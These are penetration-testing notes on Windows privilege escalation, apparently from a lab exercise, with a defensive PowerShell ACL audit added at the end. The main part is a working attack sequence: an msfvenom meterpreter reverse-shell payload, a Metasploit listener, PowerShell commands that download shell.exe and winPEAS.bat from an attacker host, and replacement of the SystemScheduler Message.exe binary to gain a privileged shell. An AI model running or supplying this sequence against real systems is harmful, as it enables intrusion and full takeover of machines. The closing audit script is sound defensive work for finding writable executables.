Windows Privilege Escalation
Generate a payload with a better shell
hacker machine
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4442 -f exe -o shell.exe
Serve shell.exe from a local HTTP server
hacker machine
python3 -m http.server
Run listener
msfconsole
msf6 > search multi handler
> 5 exploit/multi/handler
...
...
msf6 > use 5
msf6 exploit(multi/handler) > set LHOST 10.18.9.175
msf6 exploit(multi/handler) > set LPORT 4442
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
Get shell.exe
target machine
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
target machine
cd C:\Windows\Temp
dir
.\shell.exe
target machine
shell
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp
dir
.\winPEAS.bat
target machine
meterpreter > cd "c:\Program Files (x86)\SystemScheduler"
meterpreter > cp Message.exe Message.exe.back
meterpreter > rm "c:\Program Files (x86)\SystemScheduler\Message.exe"
meterpreter > cd "c:\Windows\Temp"
meterpreter > cp shell.exe "c:\Program Files (x86)\SystemScheduler\Message.exe"
exit
run
Now we should get a root shell.
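
The final steps rely on the current user being able to overwrite Message.exe, which is then executed in a more privileged context. As an added example (not part of the original notes), this PowerShell audit lists the directory and any executables under it whose ACL lets broad, low-privilege groups modify or replace them; the SID list, the file extensions and the default path parameter are assumptions chosen for illustration.

```powershell
# Added example, not from the original notes. Defaults below are assumptions.
param([string]$Path = 'C:\Program Files (x86)\SystemScheduler')

# Well-known SIDs for broad, low-privilege groups (locale-independent).
$broadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-4'      = 'INTERACTIVE'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

# Rights that let a principal replace or modify a file, plus the raw
# GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits that some ACEs carry.
$mask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$mask = $mask -bor 0x40000000 -bor 0x10000000

# Check the directory itself and every executable or script beneath it.
$extensions = '.exe', '.dll', '.bat', '.cmd', '.ps1'   # assumed list
$targets = @(Get-Item -LiteralPath $Path) + @(
    Get-ChildItem -LiteralPath $Path -Recurse -File |
        Where-Object { $extensions -contains $_.Extension.ToLower() }
)

$sidType  = [System.Security.Principal.SecurityIdentifier]
$findings = foreach ($item in $targets) {
    $acl = Get-Acl -LiteralPath $item.FullName
    # Ask for explicit and inherited rules with identities expressed as SIDs.
    foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
        $inheritOnly = [int]$ace.PropagationFlags -band 2   # 2 = InheritOnly
        if ($ace.AccessControlType -ne 'Allow' -or $inheritOnly) { continue }
        $sid = $ace.IdentityReference.Value
        if (-not $broadSids.ContainsKey($sid)) { continue }
        if (([int]$ace.FileSystemRights -band $mask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $item.FullName
            Principal = $broadSids[$sid]
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

$findings | Format-Table -AutoSize -Wrap
if ($findings) { exit 1 } else { Write-Output "No broad write access found under $Path" }
```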